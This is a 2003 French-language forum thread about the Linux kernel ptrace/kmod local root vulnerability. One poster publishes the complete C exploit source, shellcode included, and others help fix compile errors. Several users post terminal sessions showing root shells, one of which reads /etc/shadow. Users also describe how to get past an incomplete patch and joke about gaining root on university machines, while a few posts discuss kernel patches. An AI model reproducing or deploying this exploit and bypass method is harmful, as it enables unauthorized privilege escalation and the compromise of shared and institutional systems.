Faille de secu sur tous les kernels linux.

Recherche :

Mot : Pseudo : Filtrer
Page : 1 2 Page Suivante Page Précédente Bas de page
Auteur	Sujet : Faille de secu sur tous les kernels linux.

YupYup

Non.

Tous les kernels sont en cause.
L'exploit permet d'obtenir un acces root a une machine a partir d'un simple compte user :

[09:13][yom@rocky][~] gcc -o ptrace ptrace-kmod.c
[09:14][yom@rocky][~] ./ptrace
[+] Attached to 874
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4000da2d
[+] Now wait for suid shell...
sh-2.05a# cat /etc/shadow
root:XXXXXXXXXXXXXXXXXXXX:12113:0:99999:7:::

Je ne peux pas poster le patch sur un serveur web depuis le boulot, donc si qqun peut me filer son e-mail, je le lui enverrai afin qu'il le poste quelque part.

Publicité

Aricoh

gentil mais fo po pousser

YupYup a écrit :

Tous les kernels sont en cause.
L'exploit permet d'obtenir un acces root a une machine a partir d'un simple compte user :

Je ne peux pas poster le patch sur un serveur web depuis le boulot, donc si qqun peut me filer son e-mail, je le lui enverrai afin qu'il le poste quelque part.

Dur dur

Mais est-ce que quelqu'un de l'extérieur peut faire ce truc là s'il n'a pas de compte user ? Ex : je suis sur le net en étant connecté sous mon user, est-ce que qqun peut lancer cette commande à mon insu ?

YupYup

Non.

Pas forcement : il suffit de pouvoir placer le code compile sur une machine et de l'executer. Tu as ensuite les droits root.

zeb_

Deja poste ici (mais c'est bien de le rappeler)
http://forum.hardware.fr/forum2.ph [...] h=&subcat=

Apparemment, c'est une vulnerabilite locale seulement.

Les distros recentes : Slackware 9.0, Mandrake 9.1 sont deja patchees, et on peut s'attendre a des updates pour toutes les autres.

nikosaka

voir :
http://forum.hardware.fr/forum2.ph [...] h=&subcat=

edit : put*** encore grilled

Message édité par nikosaka le 19-03-2003 à 10:55:29

zeb_

nikosaka a écrit :

voir :
http://forum.hardware.fr/forum2.ph [...] h=&subcat=

edit : put*** encore grilled

14 secondes

kazekami

J'aime pas les gens

zeb_ a écrit :

Les distros recentes : Slackware 9.0, Mandrake 9.1 sont deja patchees, et on peut s'attendre a des updates pour toutes les autres.

la red hat 7.3 (et surement la 8.0) est patchée aussi (kernel 2.4.18-27)

---------------
Self Destruction Might Be The Answer - http://www.kazekami.org

farib

source du ptrace-kmod.c stp ??????????

localhost

127.0.0.1

Code :

/*
* Linux kernel ptrace/kmod local root exploit
*
* This code exploits a race condition in kernel/kmod.c, which creates
* kernel thread in insecure manner. This bug allows to ptrace cloned
* process, allowing to take control over privileged modprobe binary.
*
* Should work under all current 2.2.x and 2.4.x kernels.
*
* I discovered this stupid bug independently on January 25, 2003, that
* is (almost) two month before it was fixed and published by Red Hat
* and others.
*
* Wojciech Purczynski <cliph@isec.pl>
*
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY*
* IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY
*
* (c) 2003 Copyright by iSEC Security Research
*/
#include <grp.h>
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <paths.h>
#include <string.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/param.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/socket.h>
#include <linux/user.h>
char cliphcode[] =
"\x90\x90\xeb\x1f\xb8\xb6\x00\x00"
"\x00\x5b\x31\xc9\x89\xca\xcd\x80"
"\xb8\x0f\x00\x00\x00\xb9\xed\x0d"
"\x00\x00\xcd\x80\x89\xd0\x89\xd3"
"\x40\xcd\x80\xe8\xdc\xff\xff\xff";
#define CODE_SIZE (sizeof(cliphcode) - 1)
pid_t parent = 1;
pid_t child = 1;
pid_t victim = 1;
volatile int gotchild = 0;
void fatal(char * msg)
{
perror(msg);
kill(parent, SIGKILL);
kill(child, SIGKILL);
kill(victim, SIGKILL);
}
void putcode(unsigned long * dst)
{
char buf[MAXPATHLEN + CODE_SIZE];
unsigned long * src;
int i, len;
memcpy(buf, cliphcode, CODE_SIZE);
len = readlink("/proc/self/exe", buf + CODE_SIZE, MAXPATHLEN - 1);
if (len == -1)
fatal("[-] Unable to read /proc/self/exe" );
len += CODE_SIZE + 1;
buf[len] = '\0';
src = (unsigned long*) buf;
for (i = 0; i < len; i += 4)
if (ptrace(PTRACE_POKETEXT, victim, dst++, *src++) == -1)
fatal("[-] Unable to write shellcode" );
}
void sigchld(int signo)
{
struct user_regs_struct regs;
if (gotchild++ == 0)
return;
fprintf(stderr, "[+] Signal caught\n" );
if (ptrace(PTRACE_GETREGS, victim, NULL, ®s) == -1)
fatal("[-] Unable to read registers" );
fprintf(stderr, "[+] Shellcode placed at 0x%08lx\n", regs.eip);
putcode((unsigned long *)regs.eip);
fprintf(stderr, "[+] Now wait for suid shell...\n" );
if (ptrace(PTRACE_DETACH, victim, 0, 0) == -1)
fatal("[-] Unable to detach from victim" );
exit(0);
}
void sigalrm(int signo)
{
errno = ECANCELED;
fatal("[-] Fatal error" );
}
void do_child(void)
{
int err;
child = getpid();
victim = child + 1;
signal(SIGCHLD, sigchld);
do
err = ptrace(PTRACE_ATTACH, victim, 0, 0);
while (err == -1 && errno == ESRCH);
if (err == -1)
fatal("[-] Unable to attach" );
fprintf(stderr, "[+] Attached to %d\n", victim);
while (!gotchild) ;
if (ptrace(PTRACE_SYSCALL, victim, 0, 0) == -1)
fatal("[-] Unable to setup syscall trace" );
fprintf(stderr, "[+] Waiting for signal\n" );
for(;;);
}
void do_parent(char * progname)
{
struct stat st;
int err;
errno = 0;
socket(AF_SECURITY, SOCK_STREAM, 1);
do {
err = stat(progname, &st);
} while (err == 0 && (st.st_mode & S_ISUID) != S_ISUID);
if (err == -1)
fatal("[-] Unable to stat myself" );
alarm(0);
system(progname);
}
void prepare(void)
{
if (geteuid() == 0) {
initgroups("root", 0);
setgid(0);
setuid(0);
execl(_PATH_BSHELL, _PATH_BSHELL, NULL);
fatal("[-] Unable to spawn shell" );
}
}
int main(int argc, char ** argv)
{
prepare();
signal(SIGALRM, sigalrm);
alarm(10);
parent = getpid();
child = fork();
victim = child + 1;
if (child == -1)
fatal("[-] Unable to fork" );
if (child == 0)
do_child();
else
do_parent(argv[0]);
return 0;
}

enjoy :whistle:

cmotsch

localhost a écrit :

[cpp]

enjoy :whistle:

Argh, efface !

Et si des gamins essayaient de pirater le réseau de leur lycée/fac avec ça ? [:alph-one]

Publicité

localhost

127.0.0.1

N'empêche que "I discovered this stupid bug independently on January 25, 2003, that is (almost) two month before it was fixed and published by Red Hat and others"...

hum ... ...

localhost

127.0.0.1

cmotsch a écrit :

Argh, efface !

Et si des gamins essayaient de pirater le réseau de leur lycée/fac avec ça ? [:alph-one]

Bah, cai bien nan ? [:dawa]

asphro

excellent je voulais un acces root pour compiler des softs a mon iut \o/

chaica

localhost : tout à fait. Pas de rétention de savoir.

CHaiCA

asphro

Sinon c assez desatreux cette exploit est sorti depuis 25 janvier et le seul patch qu on trouve c un truc pourri qui patch meme pas sur les kernel !!

la franchement micorosoft doit bien se foutre des dev de linux et de leur communauté !

beber.doneux01

oui

'taint c'est ENORME comme faille ca !

asphro

patching recompilos la \o/

Je@nb

Kindly give dime

j'arrive pas à compiler
ptrace.c: In function `sigchld':
ptrace.c:179: parse error before character 0256

l179 : if (ptrace(PTRACE_GETREGS, victim, NULL, ®s) == -1)

Sinon pour le patch du kernel, g dl sur kernel.org le 2.4.20 (g supprimé celui que javais .. ) et ait fait un copier collé d'un truc que g trouvé sur linuxfr mais ça marche pas.

J'ai pleins de :
Hunk #1 FAILED at 362.
Hunk #2 FAILED at 486.
Hunk #3 FAILED at 851.
3 out of 3 hunks FAILED -- saving rejects to file include/linux/sched.h.rej
patching file kernel/fork.c
Hunk #1 FAILED at 28.
Hunk #2 FAILED at 576.
2 out of 2 hunks FAILED -- saving rejects to file kernel/fork.c.rej
patching file kernel/ptrace.c
Hunk #1 FAILED at 21.
Hunk #2 FAILED at 61.

par exemple ...
Qqn peut me passer son .diff (soit web soit jeanb@jeanb-net.com ) ?

asphro

Je@nb a écrit :

oui y a un bug joce c'est le & accolé a regs (appelle de l adresse de reg) et non signetrademark(s)

Message édité par asphro le 19-03-2003 à 21:02:22

Je@nb

Kindly give dime

c koi la différence ????
Je vois toujours le registred et le s

asphro

c edité

Je@nb

Kindly give dime

je viens de voir

strobo

My words are made of silence

ouais, j'aime bien le "trou de sécurité".

Ce qu'il faut retenir de ça, c'est que linux devient un OS majeur dans l'industrie, et il va bien falloir lui trouver des défauts..

N'empêche que (sans faire de blablah...) depuis que j'ai changé cette daube de IIS/Access contre une version Linux/Apache/MySQL au boulot, ben le serveur tourne BEAUCOUP mieux (d'un point de vue OS, il est nettement plus rapide) et il s'est fait oublié...
Il y a certainement quelques trucs améliorables (sécurité mais c'est sur un LAN isolé donc pas grave) mais c'est vachement moins relou à gérer, puisqu'il n'y a presque rien à faire!

Je suis pressé de voir ce que ça va donner dans 15 ans tout ça, s'ils n'ont pas fait de Linux un Windows bis.

---------------
"Je suis si intelligent que mon cerveau est mon deuxième organe favori".

Zaib3k

et tout cas, le source donné plus haut fonctionne

et moins il y aura de failles mieux ce sera.

---------------
Le droit à la différence s'arrête là où ça commence à m'emmerder sérieusement.

asphro

le patch n est que partiel !

je m explique

en faisant un ptit teste

1) reutilisation du binaire compiler avec kernel non patché sur le meme user avec avec kernel patché

- sous le meme user meme groupe, pas de probleme passage en root \o/
- sous un user different, il foire pas de passage root

2) compilation du source sous une autre machine non patcher
et utilisation sous une mahine patché

- si votre user a les meme iud et gid, le patch marchera sur la machine patcher sans probléme
- sinon non

====================

teste realisé avec 2 users
prout et asphro

-ayant des iud et gid different mais identique pour chauqe user sur chaque machine (centralisation des comptes)

donc voila patch partiel, j aimerai avoir confirmation \o/

farib

pour ce qui est de tester je vais finalement quand même pas prendre le risque de me faire griller et bannir a vie voir exclure, enfin en ce qui me concerne....

test local only

Code :

farib@alizee:~$ ls /root
/bin/ls: /root: Permission denied
farib@alizee:~$ gcc faille.c -o faille
farib@alizee:~$ ./faille
[+] Attached to 21621
[+] Signal caught
[+] Shellcode placed at 0x4000e132
[+] Now wait for suid shell...
sh-2.05a# ls /root
e2fsprogs-1.32 eggdrop loadlin16c.txt smb.conf
e2fsprogs-1.32.tar.gz ing loadlin16c.zip
sh-2.05a# exit
farib@alizee:~$

Message édité par farib le 20-03-2003 à 00:52:05

---------------
Bitcoin, Magical Thinking, and Political Ideology

Profil supprimé

pratik en cas de perte de mot de passe root

asphro

AsPHrO a écrit :

rectification

enfait on peut le compiler sur machine patcher ou pas peut d importance !

il suffit de le lancer au moins 1 fois sur une machine non patcher avec le même uid et gid que la machine patché

ensuite ca marche sur la machine patché \o/

nikosaka

marche pas sur un kernel 2.4.20 patché pour la faille ptrace et aussi avec grsecurity.
j'ai une erreur: blabla error 123

localhost

127.0.0.1

farib a écrit :

on peut se faire griller si on tente d'utiliser discrètement la faille ?

Nan nan, c'est invisible [:kiki]

asphro

nikosaka a écrit :

marche pas sur un kernel 2.4.20 patché pour la faille ptrace et aussi avec grsecurity.
j'ai une erreur: blabla error 123

moi ca passe !!

avec grsecurity

exemple de mon expli au dessus

minautore est la machine non patché
tropic machine patché

partition nfs pour home qui se trouve sur tropic

login as: asphro
Sent username "asphro"
asphro@tropic.synoptick.com's password:
Last login: Wed Mar 19 22:05:15 2003
prout
asphro@tropic asphro $ rm ptrace
rm: remove write-protected regular file `ptrace'? y
asphro@tropic asphro $ gcc ptrace.c -o ptrace
asphro@tropic asphro $ ./ptrace
[-] Unable to attach: Operation not permitted
Killed
asphro@tropic asphro $ ssh minautore
ssh: connect to host minautore port 22: Connection refused
asphro@tropic asphro $ ssh minautore
asphro@minautore's password:
Last login: Wed Mar 19 23:11:56 2003
asphro@minautore asphro $ gcc ptrace.c -o ptrace
ptrace ptrace.c ptrace12
ptrace-de-prout ptrace.c~
asphro@minautore asphro $ gcc ptrace.c -o ptrace
asphro@minautore asphro $ exit
logout
Connection to minautore closed.
asphro@tropic asphro $ ./ptrace
[-] Unable to attach: Operation not permitted
Killed
asphro@tropic asphro $ ssh minautore
asphro@minautore's password:
Last login: Wed Mar 19 23:19:31 2003 from tropic.synoptick.com
asphro@minautore asphro $ ./ptrace
[+] Attached to 7317
[+] Signal caught
[+] Shellcode placed at 0x4100ee2d
[+] Now wait for suid shell...
sh-2.05b# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
sh-2.05b# exit
exit
asphro@minautore asphro $ id
uid=1005(asphro) gid=100(users) groups=100(users),10(wheel),18(audio),666(userstest)
asphro@minautore asphro $ ./ptrace
root@minautore asphro # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
root@minautore asphro # \o/
sh: o/: No such file or directory
root@minautore asphro # exit
exit
asphro@minautore asphro $ exit
logout
Connection to minautore closed.
asphro@tropic asphro $ ./ptrace
root@tropic asphro # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
root@tropic asphro #

Message édité par asphro le 19-03-2003 à 22:22:12

nikosaka

moi ça passe pas
voilà mon patch : http://www.hardrock.org/kernel/2.4 [...] race.patch

par contre après l'éxécution de l'exploit j'ai un process ptrace qui reste

asphro

nikosaka a écrit :

moi ça passe pas
voilà mon patch : http://www.hardrock.org/kernel/2.4 [...] race.patch

par contre après l'éxécution de l'exploit j'ai un process ptrace qui reste

ben je l ai eu la aussi

t as essaye avec 2 machines patche et pas patché ? ?

nikosaka

nan j'ai qu'une machine qui est patchée.
Ce qui est zarb c'est que j'ai pas la même erreur que toi à l'éxécution de l'exploit.

asphro

je vais réesayer avec ton patch

moi j ai prix le pourri du mail de alan cox !

nikosaka

j'avais commencé aussi avec la daube de cox et il me renvoyait plein d'erreurs.
avec l'autre pas de problèmes.
ensuite le patch pour grsecurity n'as pas posé de pb, j'avais un peu peur du fait que certains fichiers patchés avec gresc l'étaient également dans le patch de rectif de ptrace.
mais bon apparement l'exploit ne fonctionne pas

Message édité par nikosaka le 19-03-2003 à 22:36:40

asphro

grsecurity de base ne fais rien contre l exploit j avais un 2.4.19 avant avec grsecurity activé

asphro

citation de linuxfr.org

La faille est corrigée dans Linux 2.2.25 pour le noyau 2.2, et un patch est fourni par Alan Cox pour les noyaux 2.4. Les versions 2.0 et 2.5 ne sont pas vulnérables (de lapin).

en effet ca marche pas du tout sur le 2.5.x

:lol: :lol:

asphro@minautore asphro $ uname -a
Linux minautore.synoptick.com 2.5.64 #2 Thu Mar 13 20:58:54 CET 2003 i686 Intel(R) Celeron(TM) CPU 1200MHz GenuineIntel GNU/Linux
asphro@minautore asphro $ ./ptrace
root@minautore asphro # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
root@minautore asphro #

localhost

127.0.0.1

Bon asphro, t'arrêtes de t'exciter devant cet exploit !

asphro

ben je crois qu il faudrait avertir que leur patch il est bidon non :sarcastic:

Publicité

Page : 1 2

Page Suivante

Page Précédente

Haut de page

FORUM HardWare.fr

Linux et OS Alternatifs

Codes et scripts

Faille de secu sur tous les kernels linux.

Sujets relatifs
Cherche prgrm linux qui donne le temps de connection	acces physique des disques sous linux
Msn + firewall sous linux ?	port 21 sous linux
Linux et le son (divers logiciels) ?	topik vénération jar jar /faille dans le noyau 2.4
carte PCMCIA USB2 compatible linux ?	Liste des packages nécessaires à Linux ????
[GNU/Linux] Découper un .mp3 avec un .cue (résolu)	[GNU/Linux] Décompression de fichiers .ace (résolu)
Plus de sujets relatifs à : Faille de secu sur tous les kernels linux.

Page générée en 0.175 secondes